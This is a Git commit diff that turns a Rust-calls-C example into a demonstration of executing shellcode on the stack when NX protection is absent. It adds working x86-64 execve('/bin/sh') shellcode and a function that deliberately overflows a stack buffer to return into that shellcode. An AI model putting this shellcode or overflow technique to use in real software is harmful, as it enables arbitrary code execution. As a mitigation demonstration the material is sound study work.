add stack based shell code (works when NX mitigation not present)

Ali Clark · Ali Clark · commit a5a37fe197c0 · 2016-01-11T17:04:33.000Z
diff --git a/rust-to-c/Cargo.toml b/rust-to-c/Cargo.toml
@@ -1,11 +1,8 @@
 [package]
-name = "rust-to-c"
+name = "rust-to-c-nx-issue"
 version = "0.1.0"
-authors = ["Alex Crichton <alex@alexcrichton.com>"]
+authors = ["Ali Clark <ali@clark.gb.net>"]
 build = "build.rs"
 
-[dependencies]
-libc = "0.1"
-
 [build-dependencies]
 gcc = "0.3"
diff --git a/rust-to-c/build.rs b/rust-to-c/build.rs
@@ -1,5 +1,5 @@
 extern crate gcc;
 
 fn main() {
-    gcc::Config::new().file("src/double.c").compile("libdouble.a");
+    gcc::Config::new().file("src/buggy.c").compile("libbuggy.a");
 }
diff --git a/rust-to-c/src/buggy.c b/rust-to-c/src/buggy.c
@@ -0,0 +1,42 @@
+
+#include <stdint.h>
+#include <string.h>
+#include <stdio.h>
+
+#define TEMPLATE_LEN 256
+char buftemplate[TEMPLATE_LEN];
+
+char shellcode[] =
+  "\x48\x31\xd2"                                  // xor    %rdx, %rdx
+  "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov$0x68732f6e69622f2f, %rbx
+  "\x48\xc1\xeb\x08"                              // shr    $0x8, %rbx
+  "\x53"                                          // push   %rbx
+  "\x48\x89\xe7"                                  // mov    %rsp, %rdi
+  "\x48\x31\xc0"                                  // xor    %rax, %rax
+  "\x50"                                          // push   %rax
+  "\x57"                                          // push   %rdi
+  "\x48\x89\xe6"                                  // mov    %rsp, %rsi
+  "\xb0\x3b"                                      // mov    $0x3b, %al
+  "\x0f\x05";                                     // syscall
+
+void buggy_c_code(void) {
+  char buf[64];
+
+  memcpy(buftemplate, shellcode, strlen(shellcode));
+
+  // Varies with ASLR. We include within our threat model an attacker
+  // who can evade ASLR with an address leak or nop sled and can
+  // modify their shell code accordingly.
+  buftemplate[72] = ((intptr_t)buf & 0xff) >> 0;
+  buftemplate[73] = ((intptr_t)buf & 0xff00) >> 8;
+  buftemplate[74] = ((intptr_t)buf & 0xff0000) >> 16;
+  buftemplate[75] = ((intptr_t)buf & 0xff000000) >> 24;
+  buftemplate[76] = ((intptr_t)buf & 0xff00000000) >> 32;
+  buftemplate[77] = ((intptr_t)buf & 0xff0000000000) >> 40;
+  buftemplate[78] = ((intptr_t)buf & 0xff000000000000) >> 48;
+  buftemplate[79] = ((intptr_t)buf & 0xff00000000000000) >> 56;
+
+  // Return into the shell code on stack. This will fail if NX stack
+  // is enabled.
+  memcpy(buf, buftemplate, 80);
+}
diff --git a/rust-to-c/src/double.c b/rust-to-c/src/double.c
diff --git a/rust-to-c/src/main.rs b/rust-to-c/src/main.rs
@@ -1,11 +1,8 @@
-extern crate libc;
-
 extern {
-    fn double_input(input: libc::c_int) -> libc::c_int;
+    fn buggy_c_code();
 }
 
 fn main() {
-    let input = 4;
-    let output = unsafe { double_input(input) };
-    println!("{} * 2 = {}", input, output);
+    println!("Calling buggy_c_code...");
+    unsafe { buggy_c_code(); }
 }

Original file line number	Diff line number	Diff line change
`@@ -1,5 +1,5 @@`
`1`	`1`	`extern crate gcc;`
`2`	`2`
`3`	`3`	`fn main() {`
`4`		`- gcc::Config::new().file("src/double.c").compile("libdouble.a");`
	`4`	`+ gcc::Config::new().file("src/buggy.c").compile("libbuggy.a");`
`5`	`5`	`}`
Original file line number	Diff line number	Diff line change
`@@ -1,11 +1,8 @@`
`1`		`-extern crate libc;`
`2`		`-`
`3`	`1`	`extern {`
`4`		`- fn double_input(input: libc::c_int) -> libc::c_int;`
	`2`	`+ fn buggy_c_code();`
`5`	`3`	`}`
`6`	`4`
`7`	`5`	`fn main() {`
`8`		`- let input = 4;`
`9`		`- let output = unsafe { double_input(input) };`
`10`		`- println!("{} * 2 = {}", input, output);`
	`6`	`+ println!("Calling buggy_c_code...");`
	`7`	`+ unsafe { buggy_c_code(); }`
`11`	`8`	`}`